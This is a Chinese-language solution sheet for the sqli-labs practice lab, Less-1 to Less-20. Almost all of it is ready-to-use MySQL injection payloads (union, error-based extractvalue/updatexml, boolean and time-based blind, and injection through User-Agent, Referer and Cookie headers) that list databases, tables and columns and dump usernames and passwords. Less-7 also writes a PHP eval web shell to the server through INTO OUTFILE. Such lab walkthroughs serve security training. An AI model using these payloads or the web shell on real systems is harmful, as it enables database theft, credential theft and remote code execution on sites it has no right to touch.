Get参数类型:
Less-1:单引号闭合
方法一:联合注入
确认参数闭合类型:?id=1' --+
确认表中字段数量:?id=1'order by 3 --+
确认页面回显位置:?id=-1' union select 1,2,3 --+
获取此数据库信息:?id=-1' union select 1,database(),current_user() --+
获取所有数据库名:?id=-1' union select 1,(group_concat(schema_name)),3 from information_schema.schemata --+
获取库中所有表名:?id=-1' union select 1,(group_concat(table_name)),3 from information_schema.tables where table_schema='security' --+
获取表中所有字段:?id=-1' union select 1,(group_concat(column_name)),3 from information_schema.columns where table_name='users' --+
获取用户名和密码:?id=-1' union select 1,(group_concat(username,id,password)),3 from users --+
方法二:extractvalue报错注入
判断参数闭合类型:?id=1' --+
获取此数据库信息:?id=-1' and (extractvalue(1,concat(0x7e,database(),0x7e))) --+
获取所有数据库名:?id=-1' and (extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e))) --+
获取库中所有表名:?id=-1' and (extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))) --+
获取表中所有字段:?id=-1' and (extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e))) --+
获取所有字段内容:?id=-1' and (extractvalue(1,concat(0x7e,(select group_concat(username,password) from users),0x7e))) --+
方法三:updatexml报错注入
判断参数闭合类型:?id=1' --+
获取此数据库信息:?id=-1' and (updatexml(1,concat(0x7e,database(),0x7e),1)) --+
获取所有数据库名:?id=-1' and (updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1)) --+
获取库中所有表名:?id=-1' and (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)) --+
获取表中所有字段:?id=-1' and (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name ='users'),0x7e),1)) --+
获取所有字段内容:?id=-1' and (updatexml(1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1)) --+
Less-2:数字型
联合注入
确认参数闭合类型:?id=1 --+
确认表中字段数量:?id=1 order by 3 --+
确认页面回显位置:?id=-1 union select 1,2,3 --+
获取此数据库信息:?id=-1 union select 1,database(),current_user() --+
获取所有数据库名:?id=-1 union select 1,(group_concat(schema_name)),3 from information_schema.schemata --+
获取库中所有表名:?id=-1 union select 1,(group_concat(table_name)),3 from information_schema.tables where table_schema='security' --+
获取表中所有字段:?id=-1 union select 1,(group_concat(column_name)),3 from information_schema.columns where table_name='users' --+
获取用户名和密码:?id=-1 union select 1,(group_concat(username,id,password)),3 from users --+
Less-3:单引号+括号闭合
联合注入
确认参数闭合类型:?id=1') --+
确认表中字段数量:?id=1') order by 3 --+
确认页面回显位置:?id=-1') union select 1,2,3 --+
获取此数据库信息:?id=-1') union select 1,database(),current_user() --+
获取所有数据库名:?id=-1') union select 1,(group_concat(schema_name)),3 from information_schema.schemata --+
获取库中所有表名:?id=-1') union select 1,(group_concat(table_name)),3 from information_schema.tables where table_schema='security' --+
获取表中所有字段:?id=-1') union select 1,(group_concat(column_name)),3 from information_schema.columns where table_name='users' --+
获取用户名和密码:?id=-1') union select 1,(group_concat(username,id,password)),3 from users --+
Less-4:双引号+括号闭合
联合注入
确认参数闭合类型:?id=1") --+
确认表中字段数量:?id=1") order by 3 --+
确认页面回显位置:?id=-1') union select 1,2,3 --+
获取此数据库信息:?id=-1") union select 1,database(),current_user() --+
获取所有数据库名:?id=-1") union select 1,(group_concat(schema_name)),3 from information_schema.schemata --+
获取库中所有表名:?id=-1") union select 1,(group_concat(table_name)),3 from information_schema.tables where table_schema='security' --+
获取表中所有字段:?id=-1") union select 1,(group_concat(column_name)),3 from information_schema.columns where table_name='users' --+
获取用户名和密码:?id=-1") union select 1,(group_concat(username,id,password)),3 from users --+
Less-5:单引号闭合
布尔盲注
判断数据库名长度:?id=1' and length(database())<9 --+
判断数据库的名称:?id=1' and ascii(substr(database(),1,1))=115 --+
判断所有表名长度:?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13 --+
逐一判断表的名称:?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99 --+
判断所有字段长度:?id=1' and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20 --+
逐一判断字段名称:?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99 --+
判断字段内容长度:?id=1' and length((select group_concat(username,password) from users))>109 --+
逐一判断字段内容:?id=1' and ascii(substr((select group_concat(username,password) from users),1,1))>50 --+
Less-6:双引号闭合
布尔盲注
判断数据库名长度:?id=1" and length(database())<9 --+
判断数据库的名称:?id=1" and ascii(substr(database(),1,1))=115 --+
判断所有表名长度:?id=1" and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13 --+
逐一判断表的名称:?id=1" and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99 --+
判断所有字段长度:?id=1" and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20 --+
逐一判断字段名称:?id=1" and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99 --+
判断字段内容长度:?id=1" and length((select group_concat(username,password) from users))>109 --+
逐一判断字段内容:?id=1" and ascii(substr((select group_concat(username,password) from users),1,1))>50 --+
Less-7:单引号+双括号闭合
文件注入
确认参数闭合类型:?id=1')) --+
确认表中字段数量:?id=1')) order by 3 --+
尝试注入普通文件:?id=-1')) union select 1,2,3 into outfile '/var/www/html/Less-7/123.txt' --+
尝试注入木马文件:?id=-1')) union select "<?php @eval($_POST['cmd']);?>",2,3 into outfile '/var/www/html/Less-7/test.php' --+
Less-8:单引号闭合
布尔盲注
判断数据库名长度:?id=1' and length(database())<9 --+
判断数据库的名称:?id=1' and ascii(substr(database(),1,1))=115 --+
判断所有表名长度:?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13 --+
逐一判断表的名称:?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99 --+
判断所有字段长度:?id=1' and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20 --+
逐一判断字段名称:?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99 --+
判断字段内容长度:?id=1' and length((select group_concat(username,password) from users))>109 --+
逐一判断字段内容:?id=1' and ascii(substr((select group_concat(username,password) from users),1,1))>50 --+
Less-9:单引号闭合
时间盲注
判断参数闭合类型:?id=1' and if(1=1,sleep(3),1) --+
判断数据库名长度:?id=1' and if(length(database())=8,sleep(3),1) --+
判断数据库名字符:?id=1' and if(ascii(substr(database(),1,1))=115,sleep(3),1) --+
判断所有表名长度:?id=1' and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(3),1) --+
逐一判断所有表名:?id=1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(3),1) --+
判断所有字段长度:?id=1' and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20,sleep(3),1) --+
逐一判断字段名称:?id=1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99,sleep(3),1) --+
判断字段内容长度:?id=1' and if(length((select group_concat(username,password) from users))>109,sleep(3),1) --+
逐一判断字段内容:?id=1' and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(3),1) --+
Less-10:双引号闭合
时间盲注
判断参数闭合类型:?id=1" and if(1=1,sleep(3),1) --+
判断数据库名长度:?id=1" and if(length(database())=8,sleep(3),1) --+
判断数据库名字符:?id=1" and if(ascii(substr(database(),1,1))=115,sleep(3),1) --+
判断所有表名长度:?id=1" and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(3),1) --+
逐一判断所有表名:?id=1" and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(3),1) --+
判断所有字段长度:?id=1" and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20,sleep(3),1) --+
逐一判断字段名称:?id=1" and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99,sleep(3),1) --+
判断字段内容长度:?id=1" and if(length((select group_concat(username,password) from users))>109,sleep(3),1) --+
逐一判断字段内容:?id=1" and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(3),1) --+
POST参数类型:
Less-11:单引号闭合
方法一:联合注入
判断账号闭合类型:1'
判断页面是否回显:1' or 1=1 #
判断页面回显位置:1' union select 1,2 #
查看此数据库信息:1' union select database(),current_user() #
爆破所有数据库名:1' union select group_concat(schema_name),2 from information_schema.schemata #
获取库中所有表名:1' union select group_concat(table_name),2 from information_schema.tables where table_schema='security' #
获取表中所有字段:1' union select group_concat(column_name),2 from information_schema.columns where table_name='users' #
获取用户名和密码:1' union select group_concat(username,id,password),2 from users #
方法二:extractvalue报错注入
判断参数闭合类型:1' #
获取此数据库信息:1' and (extractvalue(1,concat(0x7e,database(),0x7e))) #
获取所有数据库名:1' and (extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e))) #
获取库中所有表名:1' and (extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))) #
获取表中所有字段:1' and (extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e))) #
方法三:updatexml报错注入
判断参数闭合类型:1' #
获取此数据库信息:1' and (updatexml(1,concat(0x7e,database(),0x7e),1)) #
获取所有数据库名:1' and (updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1)) #
获取库中所有表名:1' and (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)) #
获取表中所有字段:1' and (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name ='users'),0x7e),1)) #
Less-12:双引号+括号闭合
联合注入
判断账号闭合类型:1") #
判断页面是否回显:1") or 1=1 #
判断页面回显位置:1") union select 1,2 #
查看此数据库信息:1") union select database(),current_user() #
爆破所有数据库名:1") union select group_concat(schema_name),2 from information_schema.schemata #
获取库中所有表名:1") union select group_concat(table_name),2 from information_schema.tables where table_schema='security' #
获取表中所有字段:1") union select group_concat(column_name),2 from information_schema.columns where table_name='users' #
获取用户名和密码:1") union select group_concat(username,id,password),2 from users #
Less-13:单引号+括号闭合
联合注入
判断账号闭合类型:1') #
判断页面是否回显:1') or 1=1 #
判断页面回显位置:1') union select 1,2 #
查看此数据库信息:1') union select database(),current_user() #
爆破所有数据库名:1') union select group_concat(schema_name),2 from information_schema.schemata #
获取库中所有表名:1') union select group_concat(table_name),2 from information_schema.tables where table_schema='security' #
获取表中所有字段:1') union select group_concat(column_name),2 from information_schema.columns where table_name='users' #
获取用户名和密码:1') union select group_concat(username,id,password),2 from users #
Less-14:双引号闭合
判断账号闭合类型:1"
判断页面是否回显:1" or 1=1 #
判断页面回显位置:1" union select 1,2 #
查看此数据库信息:1" union select database(),current_user() #
爆破所有数据库名:1" union select group_concat(schema_name),2 from information_schema.schemata #
获取库中所有表名:1" union select group_concat(table_name),2 from information_schema.tables where table_schema='security' #
获取表中所有字段:1" union select group_concat(column_name),2 from information_schema.columns where table_name='users' #
获取用户名和密码:1" union select group_concat(username,id,password),2 from users #
Less-15:单引号闭合
布尔盲注
Less-16:双引号+括号闭合
布尔盲注
Less-17:单引号闭合
报错注入
判断参数闭合类型:1' #
获取此数据库信息:1' and (extractvalue(1,concat(0x7e,database(),0x7e))) #
获取所有数据库名:1' and (extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e))) #
获取库中所有表名:1' and (extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))) #
获取表中所有字段:1' and (extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e))) #
Less-18:单引号闭合
报错注入
思路:页面上可以输入的账号和密码都不能注入,输入正确的账号密码登录后,会提示user-agent信息,用burpsuite测试User-Agent字段,发现会传三个参数,判断是header中的user-agent注入。
判断参数闭合类型:User-Agent:1',2,3) #
获取此数据库信息:User-Agent:1',2,(updatexml(1,concat(0x7e,database(),0x7e),1))) #
获取所有数据库名:User-Agent:1',2,(updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1)))#
获取库中所有表名:User-Agent:1',2,(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1))) #
获取表中所有字段:User-Agent:1',2,(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name ='users'),0x7e),1))) #
获取所有字段内容:User-Agent:1',2,(updatexml(1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1))) #
Less-19:单引号闭合
报错注入
思路:页面上可以输入的账号和密码都不能注入,输入正确的账号密码登录后,会提示referer信息,用burpsuite测试Referer字段,发现会传两个参数,判断是header中的referer注入。
判断参数闭合类型:Referer:1',2) #
获取此数据库信息:Referer:1',(updatexml(1,concat(0x7e,database(),0x7e),1))) #
获取所有数据库名:Referer:1',(updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1)))#
获取库中所有表名:Referer:1',(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1))) #
获取表中所有字段:Referer:1',(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name ='users'),0x7e),1))) #
获取所有字段内容:Referer:1',(updatexml(1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1))) #
Less-20:单引号闭合
报错注入
思路:页面上可以输入的账号和密码都不能注入,输入正确的账号密码登录后,提示删除cookie,用burpsuite测试cookie字段,发现uname参数可以触发报错,判断是header中的cookie注入。
判断参数闭合类型:Cookie: uname=1' #
获取此数据库信息:Cookie: uname=1' and updatexml(1,concat(0x7e,database(),0x7e),1) #
获取所有数据库名:Cookie: uname=1' and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1) #
获取库中所有表名:Cookie: uname=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#
获取表中所有字段:Cookie: uname=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name ='users'),0x7e),1) #
获取所有字段内容:Cookie: uname=1' and updatexml(1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1)#